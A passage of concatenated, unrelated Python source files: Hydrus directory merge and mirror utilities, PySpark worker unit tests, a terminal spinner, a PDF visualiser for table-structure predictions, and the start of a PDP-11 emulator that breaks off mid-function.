HydrusData.Print( 'Wanted to add write permission to "{}", but had an error: {}'.format( path, str( e ) ) )
def MergeFile( source, dest ):
if not os.path.isdir( source ):
MakeFileWritable( source )
if PathsHaveSameSizeAndDate( source, dest ):
DeletePath( source )
else:
try:
# this overwrites on conflict without hassle
shutil.move( source, dest )
except Exception as e:
HydrusData.ShowText( 'Trying to move ' + source + ' to ' + dest + ' caused the following problem:' )
HydrusData.ShowException( e )
return False
return True
def MergeTree( source, dest, text_update_hook = None ):
pauser = HydrusData.BigJobPauser()
if not os.path.exists( dest ):
try:
shutil.move( source, dest )
except OSError:
# if there were read only files in source and this was partition to partition, the copy2 goes ok but the subsequent source unlink fails
# so, if it seems this has happened, let's just try a walking mergetree, which should be able to deal with these readonlies on a file-by-file basis
if os.path.exists( dest ):
MergeTree( source, dest, text_update_hook = text_update_hook )
else:
if len( os.listdir( dest ) ) == 0:
for filename in os.listdir( source ):
source_path = os.path.join( source, filename )
dest_path = os.path.join( dest, filename )
if not os.path.isdir( source_path ):
MakeFileWritable( source_path )
shutil.move( source_path, dest_path )
else:
num_errors = 0
for ( root, dirnames, filenames ) in os.walk( source ):
if text_update_hook is not None:
text_update_hook( 'Copying ' + root + '.' )
dest_root = root.replace( source, dest )
for dirname in dirnames:
pauser.Pause()
source_path = os.path.join( root, dirname )
dest_path = os.path.join( dest_root, dirname )
MakeSureDirectoryExists( dest_path )
shutil.copystat( source_path, dest_path )
for filename in filenames:
if num_errors > 5:
raise Exception( 'Too many errors, directory move abandoned.' )
pauser.Pause()
source_path = os.path.join( root, filename )
dest_path = os.path.join( dest_root, filename )
ok = MergeFile( source_path, dest_path )
if not ok:
num_errors += 1
if num_errors == 0:
DeletePath( source )
def MirrorFile( source, dest ):
if not PathsHaveSameSizeAndDate( source, dest ):
try:
MakeFileWritable( dest )
# this overwrites on conflict without hassle
shutil.copy2( source, dest )
except Exception as e:
HydrusData.ShowText( 'Trying to copy ' + source + ' to ' + dest + ' caused the following problem:' )
HydrusData.ShowException( e )
return False
return True
def MirrorTree( source, dest, text_update_hook = None, is_cancelled_hook = None ):
pauser = HydrusData.BigJobPauser()
MakeSureDirectoryExists( dest )
num_errors = 0
for ( root, dirnames, filenames ) in os.walk( source ):
if is_cancelled_hook is not None and is_cancelled_hook():
return
if text_update_hook is not None:
text_update_hook( 'Copying ' + root + '.' )
dest_root = root.replace( source, dest )
surplus_dest_paths = { os.path.join( dest_root, dest_filename ) for dest_filename in os.listdir( dest_root ) }
for dirname in dirnames:
pauser.Pause()
source_path = os.path.join( root, dirname )
dest_path = os.path.join( dest_root, dirname )
surplus_dest_paths.discard( dest_path )
MakeSureDirectoryExists( dest_path )
shutil.copystat( source_path, dest_path )
for filename in filenames:
if num_errors > 5:
raise Exception( 'Too many errors, directory copy abandoned.' )
pauser.Pause()
source_path = os.path.join( root, filename )
dest_path = os.path.join( dest_root, filename )
surplus_dest_paths.discard( dest_path )
ok = MirrorFile( source_path, dest_path )
if not ok:
num_errors += 1
for dest_path in surplus_dest_paths:
pauser.Pause()
DeletePath( dest_path )
def OpenFileLocation( path ):
def do_it():
if HC.PLATFORM_WINDOWS:
cmd = [ 'explorer', '/select,', path ]
elif HC.PLATFORM_MACOS:
cmd = [ 'open', '-R', path ]
elif HC.PLATFORM_LINUX:
raise NotImplementedError( 'Linux cannot open file locations!' )
sbp_kwargs = HydrusData.GetSubprocessKWArgs( hide_terminal = False )
process = subprocess.Popen( cmd, **sbp_kwargs )
process.communicate()
thread = threading.Thread( target = do_it )
thread.daemon = True
thread.start()
def PathsHaveSameSizeAndDate( path1, path2 ):
if os.path.exists( path1 ) and os.path.exists( path2 ):
same_size = os.path.getsize( path1 ) == os.path.getsize( path2 )
same_modified_time = int( os.path.getmtime( path1 ) ) == int( os.path.getmtime( path2 ) )
if same_size and same_modified_time:
return True
return False
def PathIsFree( path ):
try:
stat_result = os.stat( path )
current_bits = stat_result.st_mode
if not current_bits & stat.S_IWRITE:
# read-only file, cannot do the rename check
return True
os.rename( path, path ) # rename a path to itself
return True
except OSError as e: # 'already in use by another process' or an odd filename too long error
HydrusData.Print( 'Already in use/inaccessible: ' + path )
return False
def ReadFileLikeAsBlocks( f ):
next_block = f.read( HC.READ_BLOCK_SIZE )
while len( next_block ) > 0:
yield next_block
next_block = f.read( HC.READ_BLOCK_SIZE )
def RecyclePath( path ):
if HG.file_report_mode:
HydrusData.ShowText( 'Recycling {}'.format( path ) )
HydrusData.ShowText( ''.join( traceback.format_stack() ) )
if os.path.exists( path ):
MakeFileWritable( path )
try:
send2trash.send2trash( path )
except:
HydrusData.Print( 'Trying to recycle ' + path + ' created this error:' )
HydrusData.DebugPrint( traceback.format_exc() )
HydrusData.Print( 'It has been fully deleted instead.' )
DeletePath( path )
def SanitizeFilename( filename ):
if HC.PLATFORM_WINDOWS:
# \, /, :, *, ?, ", <, >, |
filename = re.sub( r'\\|/|:|\*|\?|"|<|>|\|', '_', filename )
else:
filename = re.sub( '/', '_', filename )
return filename
|
test_worker.py
|
# -*- encoding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import tempfile
import threading
import time
import unittest
has_resource_module = True
try:
import resource
except ImportError:
has_resource_module = False
from py4j.protocol import Py4JJavaError
from pyspark.testing.utils import ReusedPySparkTestCase, PySparkTestCase, QuietTest
if sys.version_info[0] >= 3:
xrange = range
class WorkerTests(ReusedPySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
try:
self.sc.parallelize(range(1), 1).foreach(sleep)
except Exception:
pass
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
while True:
if os.path.exists(path):
with open(path) as f:
data = f.read().split(' ')
daemon_pid, worker_pid = map(int, data)
break
time.sleep(0.1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise Exception()
rdd = self.sc.parallelize(xrange(100), 1)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(xrange(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
self.assertTrue(not t.isAlive())
self.assertEqual(100000, rdd.count())
def test_with_different_versions_of_python(self):
rdd = self.sc.parallelize(range(10))
rdd.count()
version = self.sc.pythonVer
self.sc.pythonVer = "2.0"
try:
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.count())
finally:
self.sc.pythonVer = version
def test_python_exception_non_hanging(self):
# SPARK-21045: exceptions with no ascii encoding shall not hanging PySpark.
try:
def f():
raise Exception("exception with 中 and \xd6\xd0")
self.sc.parallelize([1]).map(lambda x: f()).count()
except Py4JJavaError as e:
if sys.version_info.major < 3:
# we have to use unicode here to avoid UnicodeDecodeError
self.assertRegexpMatches(unicode(e).encode("utf-8"), "exception with 中")
else:
self.assertRegexpMatches(str(e), "exception with 中")
class WorkerReuseTest(PySparkTestCase):
def test_reuse_worker_of_parallelize_xrange(self):
rdd = self.sc.parallelize(xrange(20), 8)
previous_pids = rdd.map(lambda x: os.getpid()).collect()
current_pids = rdd.map(lambda x: os.getpid()).collect()
for pid in current_pids:
self.assertTrue(pid in previous_pids)
@unittest.skipIf(
not has_resource_module,
"Memory limit feature in Python worker is dependent on "
"Python's 'resource' module; however, not found.")
class WorkerMemoryTest(PySparkTestCase):
def test_memory_limit(self):
self.sc._conf.set("spark.executor.pyspark.memory", "1m")
rdd = self.sc.parallelize(xrange(1), 1)
def getrlimit():
import resource
return resource.getrlimit(resource.RLIMIT_AS)
actual = rdd.map(lambda _: getrlimit()).collect()
self.assertTrue(len(actual) == 1)
self.assertTrue(len(actual[0]) == 2)
[(soft_limit, hard_limit)] = actual
self.assertEqual(soft_limit, 1024 * 1024)
self.assertEqual(hard_limit, 1024 * 1024)
if __name__ == "__main__":
import unittest
from pyspark.tests.test_worker import *
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
spinny.py
|
__doc__, __version__ = "A simple spinner library.", "1.1.0"
import itertools, time, threading, sys
class Spinner:
def __init__(self, dt='Loading...', at='Done.'): self.spinner,self.dt,self.at,self.busy = itertools.cycle('⠋⠙⠹⠸⠼⠴⠦⠧⠇⠏'),dt,at,True
def spin(self):
while self.busy: [print(f'{next(self.spinner)} {self.dt}', end='\r', flush=True), time.sleep(0.1)]
def __enter__(self): self.busy, _ = True, threading.Thread(target=self.spin).start()
def __exit__(self, v1, v2, v3):
self.busy, _, _ = False, time.sleep(0.1), print(' ' * (len(self.dt) + 2), end='\r')
return [True, print('❌ Failed: ' + repr(v2)), sys.exit(1)][0] if v1 is not None else print('\r\033[0;32m✓\033[0m ' + self.at)
|
visual_feedback_generator.py
|
from queue import Queue
from threading import Thread
from os import path
import gzip
import pickle
import os
import numpy as np
import cv2
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.backends.backend_pdf
from libs.configuration_manager import ConfigurationManager as gconfig
import time
import sys
class VisualFeedbackGenerator:
def __init__(self, output_path):
self._closed = False
self._initialized = False
self._output_path = output_path
self._queue = None
self._t = None
def _worker(self):
while True:
iteration_number, data = self._queue.get()
self.work(iteration_number, data)
self._queue.task_done()
def start_thread(self):
self._queue = Queue() # When we are out of `cache` number of elements in cache, push it to queue, so it could be written
self._t = Thread(target=self._worker)
self._t.setDaemon(True)
self._t.start()
self._initialized = True
def add(self, iteration_number, result):
if self._closed or (not self._initialized):
RuntimeError("Attempting to use a closed or an unopened streamer")
self._queue.put((iteration_number, result))
def close(self):
self._queue.join()
self._closed = True
def work(self, iteration_number, data):
image = data['image'] # [max_height, max_width]
gts = data['sampled_ground_truths'] # 3 x [max_entries, num_samples]
preds = data['sampled_predictions'] # 3 x [max_entries, num_samples]
sampled_indices = data['sampled_indices'] # [max_entries, num_samples]
num_vertices = data['global_features'][gconfig.get_config_param("dim_num_vertices", "int")]
height, width = data['global_features'][gconfig.get_config_param("dim_height", "int")],\
data['global_features'][gconfig.get_config_param("dim_width", "int")]
max_height, max_width = gconfig.get_config_param("max_image_height", "float"),\
gconfig.get_config_param("max_image_width", "float")
height_inches = 10*max_height/max_width
vertices = data['vertex_features'] # [max_entries, num_vertex_features]
height, width = int(height), int(width)
num_vertices = int(num_vertices)
image = image.astype(np.uint8)
image = image[:, :, 0]
assert len(gts) == 3 and len(preds) == 3
# image = image[0:height, 0:width]
image = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR)
file_path = lambda type, it: os.path.join(self._output_path, ("%05d_%s.pdf") % (it,type))
output_file_name_cells = file_path('cells', iteration_number)
output_file_name_rows = file_path('rows', iteration_number)
output_file_name_cols = file_path('cols', iteration_number)
output_file_paths = [output_file_name_cells, output_file_name_rows, output_file_name_cols]
x1s = vertices[:, gconfig.get_config_param("dim_vertex_x_position", "int")]
y1s = vertices[:, gconfig.get_config_param("dim_vertex_y_position", "int")]
x2s = vertices[:, gconfig.get_config_param("dim_vertex_x2_position", "int")]
y2s = vertices[:, gconfig.get_config_param("dim_vertex_y2_position", "int")]
test_samples = np.random.randint(0, num_vertices, size=10)
color_1 = (0, 0, 255) # (Blue)
color_2 = (0, 255, 0) # (Green)
color_3 = (255, 0, 0) # (Red)
color_4 = (255, 51, 153) # (Pink)
color_5 = (255, 153, 0) # (Orange)
for type in range(3):
_pred = preds[type]
_gt = gts[type]
samples = sampled_indices[type]
samples_per_vertex = samples.shape[1]
for sample in range(len(test_samples)):
sample_index = test_samples[sample]
image_copy = image.copy()
for i in range(samples_per_vertex):
sample_index_pair = samples[sample_index, i]
if _pred[sample_index, i] == 0 and _gt[sample_index, i] == 0: # Blue
# print("here 1")
cv2.rectangle(image_copy, (x1s[sample_index_pair], y1s[sample_index_pair]), (x2s[sample_index_pair], y2s[sample_index_pair]), color=color_1)
elif _pred[sample_index, i] == 1 and _gt[sample_index, i] == 1: # Green
# print("here 2")
cv2.rectangle(image_copy, (x1s[sample_index_pair], y1s[sample_index_pair]), (x2s[sample_index_pair], y2s[sample_index_pair]), color=color_2)
elif _pred[sample_index, i] == 1 and _gt[sample_index, i] == 0: # Red
# print("here 3")
cv2.rectangle(image_copy, (x1s[sample_index_pair], y1s[sample_index_pair]), (x2s[sample_index_pair], y2s[sample_index_pair]), color=color_3)
elif _pred[sample_index, i] == 0 and _gt[sample_index, i] == 1: # Pink
# print("here 4")
cv2.rectangle(image_copy, (x1s[sample_index_pair], y1s[sample_index_pair]), (x2s[sample_index_pair], y2s[sample_index_pair]), color=color_4)
else:
assert False
cv2.rectangle(image_copy, (x1s[sample_index], y1s[sample_index]), (x2s[sample_index], y2s[sample_index]), color=color_5)
plt.figure(figsize=(10, height_inches), dpi=300)
plt.imshow(image_copy)
pdf = matplotlib.backends.backend_pdf.PdfPages(output_file_paths[type])
for fig in range(1, plt.gcf().number + 1): ## will open an empty extra figure :(
pdf.savefig(fig)
pdf.close()
plt.close('all')
print("PDF written")
|
pdp11.py
|
#!/usr/bin/env python3
# This code is based on Julius Schmidt's PDP-11 emulator for JavaScript.
# You can run that one in your browser: http://pdp11.aiju.de
# (c) 2011, Julius Schmidt, JavaScript/HTML implementation, MIT License
# (c) 2019, Andriy Makukha, ported to Python 3, MIT License
# Version 6 Unix (in the disk image) is available under the four-clause BSD license.
# This implementation has two main threads: GUI and CPU (this file). They exchange `interrupts`
# through Python's PriorityQueue. Additional thread is added for the clock interrupt.
import time, array, threading, queue
from rk05 import RK05
from cons import Terminal, ostr
from interrupt import Interrupt
from disasm import DISASM_TABLE
EXTRACTED_IMAGE_FILENAME = 'extracted.img'
INT = Interrupt # shorthand for Interrupt
class Trap(Exception):
def __init__(self, num, *args):
Exception.__init__(self, *args)
self.num = num
class Page:
def __init__(self, par, pdr):
self.par = par
self.pdr = pdr
self.addr = par & 0o7777
self.len = (pdr >> 8) & 0x7F
self.read = (pdr & 2) == 2
self.write = (pdr & 6) == 6
self.ed = (pdr & 8) == 8
class PDP11:
FLAGN = 8
FLAGZ = 4
FLAGV = 2
FLAGC = 1
BOOTROM = [ ## (PAL-11 assembly)
0o042113, ## "KD"
0o012706, 0o2000, ## MOV #boot_start, SP
0o012700, 0o000000, ## MOV #unit, R0 ; unit number
0o010003, ## MOV R0, R3
0o000303, ## SWAB R3
0o006303, ## ASL R3
0o006303, ## ASL R3
0o006303, ## ASL R3
0o006303, ## ASL R3
0o006303, ## ASL R3
0o012701, 0o177412, ## MOV #RKDA, R1 ; csr
0o010311, ## MOV R3, (R1) ; load da
0o005041, ## CLR -(R1) ; clear ba
0o012741, 0o177000, ## MOV #-256.*2, -(R1) ; load wc
0o012741, 0o000005, ## MOV #READ+GO, -(R1) ; read & go
0o005002, ## CLR R2
0o005003, ## CLR R3
0o012704, 0o2020, ## MOV #START+20, R4
0o005005, ## CLR R5
0o105711, ## TSTB (R1)
0o100376, ## BPL .-2
0o105011, ## CLRB (R1)
0o005007 ## CLR PC
]
RS = ["R0", "R1", "R2", "R3", "R4", "R5", "SP", "PC"]
def __init__(self):
# TODO: why are these not in reset()
self.prdebug = False
self.SR2 = 0
self.interrupts = queue.PriorityQueue()
self.last_interrupt_priority = INT.MAX_PRIORITY
self.running = threading.Event()
# Terminal
self.terminal = Terminal(self)
self.terminal.master.title("PDP-11 emulator @ Python")
self.place_window(self.terminal.master)
# Magnetic disk drive
self.rk = RK05(self)
self.reset()
def place_window(self, master):
try:
master.update_idletasks()
except:
return
sw = master.winfo_screenwidth()
sh = master.winfo_screenheight()
w, h = map(int, master.geometry().split('+')[0].split('x'))
x = max(int((sw-w)/3), 0)
y = max(int((sh-h)/2), 0)
master.geometry('{}x{}+{}+{}'.format(w, h, x, y))
def reset(self):
self.running.clear()
self.clock_running = False # do not enter wait mode until sure that the clock is running
# otherwise - probably in the boot screen, clock interrupt doesn't work (TODO)
self.R = [0, 0, 0, 0, 0, 0, 0, 0] # registers
self.KSP = 0 # kernel mode stack pointer
self.USP = 0 # user mode stack pointer
self.PS = 0 # processor status
self.curPC = 0 # address of current instruction
self.instr = 0 # current instruction
self.memory = array.array('H', bytearray(256*1024*[0])) # 128K of 16-bit unsigned values
self.iter_cnt = 0
self.step_cnt = 0 # unlike iter_cnt doesn't get reset by clock interrupt
self.SR0 = 0
self.curuser = False
self.prevuser = False
self.LKS = 0x80 # Line Frequency Clock
# from reset():
for i in range(len(PDP11.BOOTROM)):
self.memory[0o1000+i] = PDP11.BOOTROM[i]
self.pages = [Page(0, 0) for _ in range(16)]
self.R[7] = 0o2002
self.terminal.request_reset()
self.rk.reinit()
self.running.set()
@staticmethod
def _xor(a, b):
return (a or b) and not (a and b)
def switchmode(self, newmode):
self.prevuser = self.curuser
self.curuser = newmode
if self.prevuser:
self.USP = self.R[6]
else:
self.KSP = self.R[6]
if self.curuser:
self.R[6] = self.USP
else:
self.R[6] = self.KSP
self.PS &= 0o007777
if self.curuser:
self.PS |= (1<<15) | (1<<14)
if self.prevuser:
self.PS |= (1<<13) | (1<<12)
def physread16(self, addr):
if addr & 1:
raise(Trap(INT.BUS, 'read from odd address ' + ostr(addr,6)))
if addr < 0o760000:
return self.memory[addr>>1]
if addr == 0o777546:
return self.LKS
if addr == 0o777570: # what does this do? 0o173030 = 63000
return 0o173030
if addr == 0o777572:
return self.SR0
if addr == 0o777576:
return self.SR2
if addr == 0o777776:
return self.PS
if (addr & 0o777770) == 0o777560:
return self.terminal.consread16(addr)
if (addr & 0o777760) == 0o777400:
return self.rk.read16(addr)
if (addr & 0o777600) == 0o772200 or (addr & 0o777600) == 0o777600:
return self.mmuread16(addr)
if addr == 0o776000:
self.panic('lolwut')
raise(Trap(INT.BUS, 'read from invalid address ' + ostr(addr,6)))
def physread8(self, addr):
val = self.physread16(addr & ~1)
if addr & 1:
return val >> 8
return val & 0xFF
def physwrite8(self, a, v):
if a < 0o760000:
if a & 1:
self.memory[a>>1] &= 0xFF
self.memory[a>>1] |= (v & 0xFF) << 8
else:
self.memory[a>>1] &= 0xFF00
self.memory[a>>1] |= v & 0xFF
else:
if a & 1:
self.physwrite16(a&~1, (self.physread16(a) & 0xFF) | ((v & 0xFF) << 8))
else:
self.physwrite16(a&~1, (self.physread16(a) & 0xFF00) | (v & 0xFF))
def physwrite16(self, a, v):
if a % 1:
raise(Trap(INT.BUS, "write to odd address " + ostr(a,6)))
if a < 0o760000:
try:
self.memory[a>>1] = v
except OverflowError as e: # dirty fix of a problem
if v < 0:
#self.writedebug("warning: negative value @ physwrite16\n") # TODO: clean it up so that it doesn happen
self.memory[a>>1] = v & 0xFFFF
elif v > 0xFFFF:
#self.writedebug("warning: short overflow @ physwrite16\n") # TODO: clean it up so that it doesn happen
self.memory[a>>1] = v & 0xFFFF
else:
raise e
elif a == 0o777776:
bits = (v >> 14) & 3
if bits == 0:
self.switchmode(False)
elif bits == 3:
self.switchmode(True)
else:
self.panic("invalid mode")
bits = (v >> 12) & 3
if bits == 0:
self.prevuser = False
elif bits == 3:
self.prevuser = True
else:
self.panic("invalid mode")
self.PS = v
elif a == 0o777546:
self.LKS = v
elif a == 0o777572:
self.SR0 = v
elif (a & 0o777770) == 0o777560:
self.terminal.conswrite16(a, v)
elif (a & 0o777700) == 0o777400:
self.rk.write16(a,v)
elif (a & 0o777600) == 0o772200 or (a & 0o777600) == 0o777600:
self.mmuwrite16(a,v)
else:
raise(Trap(INT.BUS, "write to invalid address " + ostr(a,6)))
def decode(self, a, w, m):
#var p, user, block, disp
if not (self.SR0 & 1):
if a >= 0o170000:
a += 0o600000
return a
user = 8 if m else 0
p = self.pages[(a >> 13) + user]
if w and not p.write:
self.SR0 = (1<<13) | 1
self.SR0 |= (a >> 12) & ~1
if user:
self.SR0 |= (1<<5) | (1<<6)
self.SR2 = self.curPC
raise(Trap(INT.FAULT, "write to read-only page " + ostr(a,6)))
if not p.read:
self.SR0 = (1<<15) | 1
self.SR0 |= (a >> 12) & ~1
if user:
self.SR0 |= (1<<5)|(1<<6)
self.SR2 = self.curPC
raise(Trap(INT.FAULT, "read from no-access page " + ostr(a,6)))
block = (a >> 6) & 0o177
disp = a & 0o77
if (p.ed and (block < p.len)) or (not p.ed and (block > p.len)):
self.SR0 = (1<<14) | 1
self.SR0 |= (a >> 12) & ~1
if user:
self.SR0 |= (1<<5)|(1<<6)
self.SR2 = self.curPC
raise(Trap(INT.FAULT, "page length exceeded, address " + ostr(a,6) + " (block " + \
ostr(block,3) + ") is beyond length " + ostr(p.len,3)))
if w:
p.pdr |= 1<<6
return ((block + p.addr) << 6) + disp
def mmuread16(self, a):
i = (a & 0o17)>>1
if (a >= 0o772300) and (a < 0o772320):
return self.pages[i].pdr
if (a >= 0o772340) and (a < 0o772360):
return self.pages[i].par
if (a >= 0o777600) and (a < 0o777620):
return self.pages[i+8].pdr
if (a >= 0o777640) and (a < 0o777660):
return self.pages[i+8].par
raise(Trap(INT.BUS, "invalid read from " + ostr(a,6)))
def mmuwrite16(self, a, v):
i = (a & 0o17)>>1
if (a >= 0o772300) and (a < 0o772320):
self.pages[i] = Page(self.pages[i].par, v)
elif (a >= 0o772340) and (a < 0o772360):
self.pages[i] = Page(v, self.pages[i].pdr)
elif (a >= 0o777600) and (a < 0o777620):
self.pages[i+8] = Page(self.pages[i+8].par, v)
elif (a >= 0o777640) and (a < 0o777660):
self.pages[i+8] = Page(v, self.pages[i+8].pdr)
else:
raise(Trap(INT.BUS, "write to invalid address " + ostr(a,6)))
def read8(self, a):
return self.physread8(self.decode(a, False, self.curuser))
def read16(self, a):
return self.physread16(self.decode(a, False, self.curuser))
def write8(self, a, v):
return self.physwrite8(self.decode(a, True, self.curuser), v)
def write16(self, a, v):
return self.physwrite16(self.decode(a, True, self.curuser), v)
def fetch16(self):
val = self.read16(self.R[7])
self.R[7] += 2
return val
def push(self, v):
self.R[6] -= 2
self.write16(self.R[6], v)
def pop(self):
val = self.read16(self.R[6])
self.R[6] += 2
return val
def disasmaddr(self, m, a):
if (m & 7) == 7:
if m == 0o27:
a[0] += 2
return "$" + oct(self.memory[a[0]>>1])[2:]
elif m == 0o37:
a[0] += 2
return "*" + oct(self.memory[a[0]>>1])[2:]
elif m == 0o67:
a[0] += 2
return "*" + oct((a[0] + 2 + self.memory[a[0]>>1]) & 0xFFFF)[2:]
elif m == 0o77:
a[0] += 2
return "**" + oct((a[0] + 2 + self.memory[a[0]>>1]) & 0xFFFF)[2:]
r = PDP11.RS[m & 7]
bits = m & 0o70
if bits == 0o00:
return r
elif bits == 0o10:
return "(" + r + ")"
elif bits == 0o20:
return "(" + r + ")+"
elif bits == 0o30:
return "*(" + r + ")+"
elif bits == 0o40:
return "-(" + r + ")"
elif bits == 0o50:
return "*-(" + r + ")"
elif bits == 0o60:
a[0]+=2
return oct(self.memory[a[0]>>1])[2:] + "(" + r + ")"
elif bits == 0o70:
a[0]+=2
return "*" + oct(self.memory[a[0]>>1])[2:] + "(" + r + ")"
def disasm(self, a):
#var i, ins, l, msg, s, d;
ins = self.memory[a>>1] # instruction
msg = None
for l in DISASM_TABLE:
if (ins & l[0]) == l[1]:
msg = l[2]
break
if not msg:
return "???"
if l[4] and ins & 0o100000:
msg += "B"
s = (ins & 0o7700) >> 6
d = ins & 0o77
o = ins & 0o377
aa = [a]
if l[3] == "SD" or l[3] == "D":
if l[3] == "SD":
msg += " " + self.disasmaddr(s, aa) + ","
msg += " " + self.disasmaddr(d, aa)
elif l[3] == "D":
msg += " " + self.disasmaddr(d, aa)
elif l[3] == "RO" or l[3] == "O":
if l[3] == "RO":
msg += " " + PDP11.RS[(ins & 0o700) >> 6] + ","; o &= 0o77
if o & 0x80:
msg += " -" + oct(2*((0xFF ^ o) + 1))[2:]
else:
msg += " +" + oct(2*o)[2:]
elif l[3] == "RD":
msg += " " + PDP11.RS[(ins & 0o700) >> 6] + ", " + self.disasmaddr(d, aa)
elif l[3] == "R":
msg += " " + PDP11.RS[ins & 7]
elif l[3] == "R3":
msg += " " + PDP11.RS[(ins & 0o700) >> 6]
return msg
def cleardebug(self):
self.terminal.cleardebug()
def writedebug(self, msg):
self.terminal.writedebug(msg)
def printstate(self):
# Display registers
self.writedebug(str(self.step_cnt)+'\n')
self.writedebug(
"R0 " + ostr(self.R[0]) + " " + \
"R1 " + ostr(self.R[1]) + " " + \
"R2 " + ostr(self.R[2]) + " " + \
"R3 " + ostr(self.R[3]) + " " + \
"R4 " + ostr(self.R[4]) + " " + \
"R5 " + ostr(self.R[5]) + " " + \
"R6 " + ostr(self.R[6]) + " " + \
"R7 " + ostr(self.R[7]) + "\n"
)
self.writedebug( "[" + \
("u" if self.prevuser else "k") + \
("U" if self.curuser else "K") + \
("N" if (self.PS & PDP11.FLAGN) else " ") + \
("Z" if (self.PS & PDP11.FLAGZ) else " ") + \
("V" if (self.PS & PDP11.FLAGV) else " ") + \
("C" if (self.PS & PDP11.FLAGC) else " ") + \
"] instr " + ostr(self.curPC) + ": " + ostr(self.instr) + " "
)
try:
decoded = self.decode(self.curPC, False, self.curuser)
self.writedebug(self.disasm(decoded) + "\n")
except Exception:
pass
def panic(self, msg):
self.writedebug('PANIC: ' + msg + '\n')
self.printstate()
self.stop_cpu()
raise Exception(msg)
def interrupt(self, vec, pri):
# This is called by CPU, GUI and clock threads
if vec & 1:
self.panic("Thou darst calling interrupt() with an odd vector number?")
self.interrupts.put(Interrupt(vec, pri))
if vec == INT.CLOCK:
self.clock_running = True
self.running.set()
def clock(self):
'''Clock thread'''
self.clock_cnt = 0
self.last_time = time.time()
while not self.clock_stop.is_set():
time.sleep(0.05) # PDP-11 clock runs at 50 or 60 Hz; intentionally running it at 20 Hz to reduce CPU usage
# time will run slower inside the emulation
# Clock interrupt
self.LKS |= 0x80 # bit 7: set to 1 every 20 ms
if self.LKS & 0x40: # bit 6: when set, an interrupt will occur
self.interrupt(INT.CLOCK, 6)
# Calculate iterations per seconds and pass to GUI thread
self.clock_cnt += 1
if self.clock_cnt & 0xF == 0:
now = time.time()
self.terminal.ips = int(self.iter_cnt/(now - self.last_time))
self.last_time = now
self.iter_cnt = 0
print('- clock stopped')
def handleinterrupt(self, vec):
# PyPDP11 interrupts
if vec & 0o400:
if vec == INT.LoadImage:
self.load_image()
return
elif vec == INT.ExtractImage:
self.extract_image()
return
elif vec == INT.Synchronize:
self.sync()
return
elif vec == INT.Reset:
self.reset()
return
# PDP-11 interrupts
try:
prev = self.PS
self.switchmode(False)
self.push(prev)
self.push(self.R[7])
except Trap as e:
self.trapat(e.num, str(e))
self.R[7] = self.memory[vec>>1]
self.PS = self.memory[(vec>>1)+1]
if self.prevuser:
self.PS |= (1<<13) | (1<<12)
def trapat(self, vec, msg):
#var prev;
if vec & 1:
self.panic("Thou darst calling trapat() with an odd vector number?")
self.writedebug("trap " + ostr(vec) + " occurred: " + msg + "\n")
self.printstate()
try:
prev = self.PS
self.switchmode(False)
self.push(prev)
self.push(self.R[7])
except Exception as e:
if 'num' in e.__dir__:
self.writedebug("red stack trap!\n")
self.memory[0] = self.R[7]
self.memory[1] = prev
vec = 4
else:
raise(e)
self.R[7] = self.memory[vec>>1]
self.PS = self.memory[(vec>>1)+1]
if self.prevuser:
self.PS |= (1<<13) | (1<<12)
self.running.set()
def aget(self, v, l):
#var addr
if (v & 7) >= 6 or (v & 0o10):
l = 2
if (v & 0o70) == 0o00:
return -(v + 1)
bits = v & 0o60
if bits == 0o00:
v &= 7
addr = self.R[v & 7]
elif bits == 0o20:
addr = self.R[v & 7]
self.R[v & 7] += l
elif bits == 0o40:
